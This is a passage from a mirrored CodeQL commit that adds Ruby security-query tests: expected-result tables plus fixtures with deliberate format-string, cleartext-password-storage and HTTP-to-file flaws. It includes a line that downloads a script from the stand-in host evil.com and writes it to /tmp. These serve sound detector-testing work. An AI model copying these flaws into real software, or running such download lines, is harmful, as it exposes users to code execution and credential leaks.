mirror of
https://github.com/github/codeql.git
synced 2026-05-01 19:55:15 +02:00
Merge branch 'main' into incomplete-url-string-sanitization
This commit is contained in:
Arthur Baars
@@ -0,0 +1,52 @@
|
||||
edges
|
||||
| tainted_format_string.rb:4:12:4:17 | call to params : | tainted_format_string.rb:4:12:4:26 | ...[...] |
|
||||
| tainted_format_string.rb:5:19:5:24 | call to params : | tainted_format_string.rb:5:19:5:33 | ...[...] |
|
||||
| tainted_format_string.rb:10:23:10:28 | call to params : | tainted_format_string.rb:10:23:10:37 | ...[...] |
|
||||
| tainted_format_string.rb:11:30:11:35 | call to params : | tainted_format_string.rb:11:30:11:44 | ...[...] |
|
||||
| tainted_format_string.rb:18:23:18:28 | call to params : | tainted_format_string.rb:18:23:18:37 | ...[...] |
|
||||
| tainted_format_string.rb:19:30:19:35 | call to params : | tainted_format_string.rb:19:30:19:44 | ...[...] |
|
||||
| tainted_format_string.rb:21:27:21:32 | call to params : | tainted_format_string.rb:21:27:21:41 | ...[...] |
|
||||
| tainted_format_string.rb:22:20:22:25 | call to params : | tainted_format_string.rb:22:20:22:34 | ...[...] |
|
||||
| tainted_format_string.rb:28:19:28:24 | call to params : | tainted_format_string.rb:28:19:28:33 | ...[...] |
|
||||
| tainted_format_string.rb:33:32:33:37 | call to params : | tainted_format_string.rb:33:32:33:46 | ...[...] : |
|
||||
| tainted_format_string.rb:33:32:33:46 | ...[...] : | tainted_format_string.rb:33:12:33:46 | ... + ... |
|
||||
| tainted_format_string.rb:36:30:36:35 | call to params : | tainted_format_string.rb:36:30:36:44 | ...[...] : |
|
||||
| tainted_format_string.rb:36:30:36:44 | ...[...] : | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" |
|
||||
nodes
|
||||
| tainted_format_string.rb:4:12:4:17 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:4:12:4:26 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:5:19:5:24 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:5:19:5:33 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:10:23:10:28 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:10:23:10:37 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:11:30:11:35 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:11:30:11:44 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:18:23:18:28 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:18:23:18:37 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:19:30:19:35 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:19:30:19:44 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:21:27:21:32 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:21:27:21:41 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:22:20:22:25 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:22:20:22:34 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:28:19:28:24 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:28:19:28:33 | ...[...] | semmle.label | ...[...] |
|
||||
| tainted_format_string.rb:33:12:33:46 | ... + ... | semmle.label | ... + ... |
|
||||
| tainted_format_string.rb:33:32:33:37 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:33:32:33:46 | ...[...] : | semmle.label | ...[...] : |
|
||||
| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | semmle.label | "A log message: #{...}" |
|
||||
| tainted_format_string.rb:36:30:36:35 | call to params : | semmle.label | call to params : |
|
||||
| tainted_format_string.rb:36:30:36:44 | ...[...] : | semmle.label | ...[...] : |
|
||||
subpaths
|
||||
#select
|
||||
| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params : | tainted_format_string.rb:4:12:4:26 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:4:12:4:17 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params : | tainted_format_string.rb:5:19:5:33 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:5:19:5:24 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params : | tainted_format_string.rb:10:23:10:37 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:10:23:10:28 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params : | tainted_format_string.rb:11:30:11:44 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:11:30:11:35 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params : | tainted_format_string.rb:18:23:18:37 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:18:23:18:28 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params : | tainted_format_string.rb:19:30:19:44 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:19:30:19:35 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params : | tainted_format_string.rb:21:27:21:41 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:21:27:21:32 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params : | tainted_format_string.rb:22:20:22:34 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:22:20:22:25 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params : | tainted_format_string.rb:28:19:28:33 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:28:19:28:24 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params : | tainted_format_string.rb:33:12:33:46 | ... + ... | $@ flows here and is used in a format string. | tainted_format_string.rb:33:32:33:37 | call to params | User-provided value |
|
||||
| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params : | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | $@ flows here and is used in a format string. | tainted_format_string.rb:36:30:36:35 | call to params | User-provided value |
|
||||
@@ -0,0 +1 @@
|
||||
queries/security/cwe-134/TaintedFormatString.ql
|
||||
@@ -0,0 +1,38 @@
|
||||
class UsersController < ActionController::Base
|
||||
|
||||
def show
|
||||
printf(params[:format], arg) # BAD
|
||||
Kernel.printf(params[:format], arg) # BAD
|
||||
|
||||
printf(params[:format]) # GOOD
|
||||
Kernel.printf(params[:format]) # GOOD
|
||||
|
||||
printf(IO.new(1), params[:format], arg) # BAD
|
||||
Kernel.printf(IO.new(1), params[:format], arg) # BAD
|
||||
|
||||
printf("%s", params[:format]) # GOOD
|
||||
Kernel.printf("%s", params[:format]) # GOOD
|
||||
fmt = "%s"
|
||||
printf(fmt, params[:format]) # GOOD
|
||||
|
||||
printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE]
|
||||
Kernel.printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE]
|
||||
|
||||
str1 = Kernel.sprintf(params[:format], arg) # BAD
|
||||
str2 = sprintf(params[:format], arg) # BAD
|
||||
|
||||
str1 = Kernel.sprintf(params[:format]) # GOOD
|
||||
str2 = sprintf(params[:format]) # GOOD
|
||||
|
||||
stdout = IO.new 1
|
||||
stdout.printf(params[:format], arg) # BAD
|
||||
|
||||
stdout.printf(params[:format]) # GOOD
|
||||
|
||||
# Taint via string concatenation
|
||||
printf("A log message: " + params[:format], arg) # BAD
|
||||
|
||||
# Taint via string interpolation
|
||||
printf("A log message: #{params[:format]}", arg) # BAD
|
||||
end
|
||||
end
|
||||
@@ -11,7 +11,7 @@
|
||||
| Httparty.rb:10:1:10:59 | call to get | This request may run with $@. | Httparty.rb:10:39:10:56 | Pair | certificate validation disabled |
|
||||
| Httparty.rb:13:1:13:70 | call to post | This request may run with $@. | Httparty.rb:13:57:13:69 | Pair | certificate validation disabled |
|
||||
| Httparty.rb:16:1:16:74 | call to post | This request may run with $@. | Httparty.rb:16:59:16:71 | Pair | certificate validation disabled |
|
||||
| NetHttp.rb:9:12:9:31 | call to request | This request may run with $@. | NetHttp.rb:7:1:7:16 | ... = ... | certificate validation disabled |
|
||||
| NetHttp.rb:9:12:9:31 | call to request | This request may run with $@. | NetHttp.rb:7:20:7:44 | ... = ... | certificate validation disabled |
|
||||
| OpenURI.rb:4:1:4:78 | call to open | This request may run with $@. | OpenURI.rb:4:36:4:77 | Pair | certificate validation disabled |
|
||||
| OpenURI.rb:7:1:7:82 | call to open | This request may run with $@. | OpenURI.rb:7:38:7:79 | Pair | certificate validation disabled |
|
||||
| OpenURI.rb:11:1:11:43 | call to open | This request may run with $@. | OpenURI.rb:10:13:10:54 | Pair | certificate validation disabled |
|
||||
|
||||
@@ -71,7 +71,7 @@ subpaths
|
||||
| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : | logging.rb:23:33:23:40 | password | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
|
||||
| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : | logging.rb:26:18:26:34 | "pw: #{...}" | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
|
||||
| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : | logging.rb:28:26:28:33 | password | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
|
||||
| logging.rb:37:20:37:34 | ...[...] | logging.rb:30:8:30:55 | call to [] : | logging.rb:37:20:37:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:30:8:30:55 | call to [] | an write to password |
|
||||
| logging.rb:37:20:37:34 | ...[...] | logging.rb:30:8:30:55 | call to [] : | logging.rb:37:20:37:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:30:8:30:55 | call to [] | a write to password |
|
||||
| logging.rb:39:20:39:34 | ...[...] | logging.rb:34:1:34:15 | call to []= : | logging.rb:39:20:39:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:34:1:34:15 | call to []= | a write to password |
|
||||
| logging.rb:69:20:69:50 | password_masked_ineffective_sub | logging.rb:59:35:59:68 | "ca497451f5e883662fb1a37bc9ec7838" : | logging.rb:69:20:69:50 | password_masked_ineffective_sub | Sensitive data returned by $@ is logged here. | logging.rb:59:35:59:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub |
|
||||
| logging.rb:69:20:69:50 | password_masked_ineffective_sub | logging.rb:63:35:63:88 | call to sub : | logging.rb:69:20:69:50 | password_masked_ineffective_sub | Sensitive data returned by $@ is logged here. | logging.rb:63:35:63:88 | call to sub | an assignment to password_masked_ineffective_sub |
|
||||
|
||||
@@ -0,0 +1,62 @@
|
||||
edges
|
||||
| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : | app/controllers/users_controller.rb:5:39:5:50 | new_password |
|
||||
| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : | app/controllers/users_controller.rb:7:41:7:52 | new_password |
|
||||
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : | app/controllers/users_controller.rb:13:42:13:53 | new_password |
|
||||
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : | app/controllers/users_controller.rb:15:49:15:60 | new_password |
|
||||
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : | app/controllers/users_controller.rb:15:87:15:98 | new_password |
|
||||
| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : | app/controllers/users_controller.rb:21:45:21:56 | new_password |
|
||||
| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : | app/controllers/users_controller.rb:21:83:21:94 | new_password |
|
||||
| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : | app/controllers/users_controller.rb:28:27:28:38 | new_password |
|
||||
| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : | app/controllers/users_controller.rb:30:28:30:39 | new_password |
|
||||
| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : | app/controllers/users_controller.rb:37:39:37:50 | new_password |
|
||||
| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : | app/controllers/users_controller.rb:44:21:44:32 | new_password |
|
||||
| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" |
|
||||
| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" |
|
||||
| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : | app/models/user.rb:5:27:5:38 | new_password |
|
||||
| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : | app/models/user.rb:11:22:11:33 | new_password |
|
||||
| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : | app/models/user.rb:17:21:17:32 | new_password |
|
||||
nodes
|
||||
| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : | semmle.label | "043697b96909e03ca907599d6420555f" : |
|
||||
| app/controllers/users_controller.rb:5:39:5:50 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:7:41:7:52 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : | semmle.label | "083c9e1da4cc0c2f5480bb4dbe6ff141" : |
|
||||
| app/controllers/users_controller.rb:13:42:13:53 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:15:49:15:60 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:15:87:15:98 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : | semmle.label | "504d224a806cf8073cd14ef08242d422" : |
|
||||
| app/controllers/users_controller.rb:21:45:21:56 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:21:83:21:94 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : | semmle.label | "7d6ae08394c3f284506dca70f05995f6" : |
|
||||
| app/controllers/users_controller.rb:28:27:28:38 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:30:28:30:39 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : | semmle.label | "ff295f8648a406c37fbe378377320e4c" : |
|
||||
| app/controllers/users_controller.rb:37:39:37:50 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : | semmle.label | "78ffbec583b546bd073efd898f833184" : |
|
||||
| app/controllers/users_controller.rb:44:21:44:32 | new_password | semmle.label | new_password |
|
||||
| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : | semmle.label | "0157af7c38cbdd24f1616de4e5321861" : |
|
||||
| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | semmle.label | "password: #{...}\\n" |
|
||||
| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | semmle.label | "password: #{...}" |
|
||||
| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : | semmle.label | "06c38c6a8a9c11a9d3b209a3193047b4" : |
|
||||
| app/models/user.rb:5:27:5:38 | new_password | semmle.label | new_password |
|
||||
| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : | semmle.label | "52652fb5c709fb6b9b5a0194af7c6067" : |
|
||||
| app/models/user.rb:11:22:11:33 | new_password | semmle.label | new_password |
|
||||
| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : | semmle.label | "f982bf2531c149a8a1444a951b12e830" : |
|
||||
| app/models/user.rb:17:21:17:32 | new_password | semmle.label | new_password |
|
||||
subpaths
|
||||
#select
|
||||
| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : | app/controllers/users_controller.rb:5:39:5:50 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | app/controllers/users_controller.rb:5:39:5:50 | new_password | here |
|
||||
| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : | app/controllers/users_controller.rb:7:41:7:52 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | here |
|
||||
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : | app/controllers/users_controller.rb:13:42:13:53 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:13:42:13:53 | new_password | here |
|
||||
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : | app/controllers/users_controller.rb:15:49:15:60 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | here |
|
||||
| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : | app/controllers/users_controller.rb:15:87:15:98 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | here |
|
||||
| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : | app/controllers/users_controller.rb:21:45:21:56 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | here |
|
||||
| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : | app/controllers/users_controller.rb:21:83:21:94 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | here |
|
||||
| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : | app/controllers/users_controller.rb:28:27:28:38 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | app/controllers/users_controller.rb:28:27:28:38 | new_password | here |
|
||||
| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : | app/controllers/users_controller.rb:30:28:30:39 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | here |
|
||||
| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : | app/controllers/users_controller.rb:37:39:37:50 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | app/controllers/users_controller.rb:37:39:37:50 | new_password | here |
|
||||
| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : | app/controllers/users_controller.rb:44:21:44:32 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | app/controllers/users_controller.rb:44:21:44:32 | new_password | here |
|
||||
| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | here |
|
||||
| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | here |
|
||||
| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : | app/models/user.rb:5:27:5:38 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | app/models/user.rb:5:27:5:38 | new_password | here |
|
||||
| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : | app/models/user.rb:11:22:11:33 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | app/models/user.rb:11:22:11:33 | new_password | here |
|
||||
| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : | app/models/user.rb:17:21:17:32 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | app/models/user.rb:17:21:17:32 | new_password | here |
|
||||
@@ -0,0 +1 @@
|
||||
queries/security/cwe-312/CleartextStorage.ql
|
||||
@@ -0,0 +1,74 @@
|
||||
class UsersController < ApplicationController
|
||||
def createLikeCall
|
||||
new_password = "043697b96909e03ca907599d6420555f"
|
||||
# BAD: plaintext password stored to database
|
||||
User.create(name: "U1", password: new_password)
|
||||
# BAD: plaintext password stored to database
|
||||
User.create({ name: "U1", password: new_password })
|
||||
end
|
||||
|
||||
def updateLikeClassMethodCall
|
||||
new_password = "083c9e1da4cc0c2f5480bb4dbe6ff141"
|
||||
# BAD: plaintext password stored to database
|
||||
User.update(1, name: "U1", password: new_password)
|
||||
# BAD: plaintext password stored to database
|
||||
User.update([1, 2], [{name: "U1", password: new_password}, {name: "U2", password: new_password}])
|
||||
end
|
||||
|
||||
def insertAllLikeCall
|
||||
new_password = "504d224a806cf8073cd14ef08242d422"
|
||||
# BAD: plaintext password stored to database
|
||||
User.insert_all([{name: "U1", password: new_password}, {name: "U2", password: new_password}])
|
||||
end
|
||||
|
||||
def updateLikeInstanceMethodCall
|
||||
user = User.find(1)
|
||||
new_password = "7d6ae08394c3f284506dca70f05995f6"
|
||||
# BAD: plaintext password stored to database
|
||||
user.update(password: new_password)
|
||||
# BAD: plaintext password stored to database
|
||||
user.update({password: new_password})
|
||||
end
|
||||
|
||||
def updateAttributeCall
|
||||
user = User.find(1)
|
||||
new_password = "ff295f8648a406c37fbe378377320e4c"
|
||||
# BAD: plaintext password stored to database
|
||||
user.update_attribute("password", new_password)
|
||||
end
|
||||
|
||||
def assignAttributeCall
|
||||
user = User.find(1)
|
||||
new_password = "78ffbec583b546bd073efd898f833184"
|
||||
# BAD: plaintext password assigned to database field
|
||||
user.password = new_password
|
||||
user.save
|
||||
end
|
||||
|
||||
def hashedPasswordAssign
|
||||
user = User.find(1)
|
||||
new_password = "3746e149bfe3d6ccc665c3620d81cd2e"
|
||||
hashed_password = hash_password(new_password)
|
||||
|
||||
# GOOD: assigned value is hashed
|
||||
user.password = hashed_password
|
||||
end
|
||||
|
||||
def fileWrites
|
||||
new_password = "0157af7c38cbdd24f1616de4e5321861"
|
||||
|
||||
# BAD: plaintext password stored to disk
|
||||
IO.write("foo.txt", "password: #{new_password}\n")
|
||||
|
||||
# BAD: plaintext password stored to disk
|
||||
File.new("bar.txt", "a").puts("password: #{new_password}")
|
||||
end
|
||||
|
||||
def randomPasswordAssign
|
||||
user = User.find(1)
|
||||
random_password = SecureRandom.hex(20)
|
||||
# GOOD: the `random_password` value here looks like the hash of an unknown password
|
||||
user.password = random_password
|
||||
user.save
|
||||
end
|
||||
end
|
||||
20
ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb
Normal file
20
ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb
Normal file
@@ -0,0 +1,20 @@
|
||||
class User < ActiveRecord::Base
|
||||
def set_password_1
|
||||
new_password = "06c38c6a8a9c11a9d3b209a3193047b4"
|
||||
# BAD: directly storing a potential cleartext password to a field
|
||||
self.update(password: new_password)
|
||||
end
|
||||
|
||||
def set_password_2
|
||||
new_password = "52652fb5c709fb6b9b5a0194af7c6067"
|
||||
# BAD: directly storing a potential cleartext password to a field
|
||||
update(password: new_password)
|
||||
end
|
||||
|
||||
def set_password_3
|
||||
new_password = "f982bf2531c149a8a1444a951b12e830"
|
||||
# BAD: directly assigning a potential cleartext password to a field
|
||||
self.password = new_password
|
||||
self.save
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,14 @@
|
||||
edges
|
||||
| http_to_file_access.rb:3:8:3:52 | call to body : | http_to_file_access.rb:5:12:5:15 | resp |
|
||||
| http_to_file_access.rb:9:16:9:21 | call to params : | http_to_file_access.rb:9:16:9:30 | ...[...] : |
|
||||
| http_to_file_access.rb:9:16:9:30 | ...[...] : | http_to_file_access.rb:11:18:11:23 | script |
|
||||
nodes
|
||||
| http_to_file_access.rb:3:8:3:52 | call to body : | semmle.label | call to body : |
|
||||
| http_to_file_access.rb:5:12:5:15 | resp | semmle.label | resp |
|
||||
| http_to_file_access.rb:9:16:9:21 | call to params : | semmle.label | call to params : |
|
||||
| http_to_file_access.rb:9:16:9:30 | ...[...] : | semmle.label | ...[...] : |
|
||||
| http_to_file_access.rb:11:18:11:23 | script | semmle.label | script |
|
||||
subpaths
|
||||
#select
|
||||
| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body : | http_to_file_access.rb:5:12:5:15 | resp | $@ flows to file system | http_to_file_access.rb:3:8:3:52 | call to body | Untrusted data |
|
||||
| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params : | http_to_file_access.rb:11:18:11:23 | script | $@ flows to file system | http_to_file_access.rb:9:16:9:21 | call to params | Untrusted data |
|
||||
@@ -0,0 +1 @@
|
||||
queries/security/cwe-912/HttpToFileAccess.ql
|
||||
@@ -0,0 +1,19 @@
|
||||
require "net/http"
|
||||
|
||||
resp = Net::HTTP.new("evil.com").get("/script").body
|
||||
file = File.open("/tmp/script", "w")
|
||||
file.write(resp) # BAD
|
||||
|
||||
class ExampleController < ActionController::Base
|
||||
def example
|
||||
script = params[:script]
|
||||
file = File.open("/tmp/script", "w")
|
||||
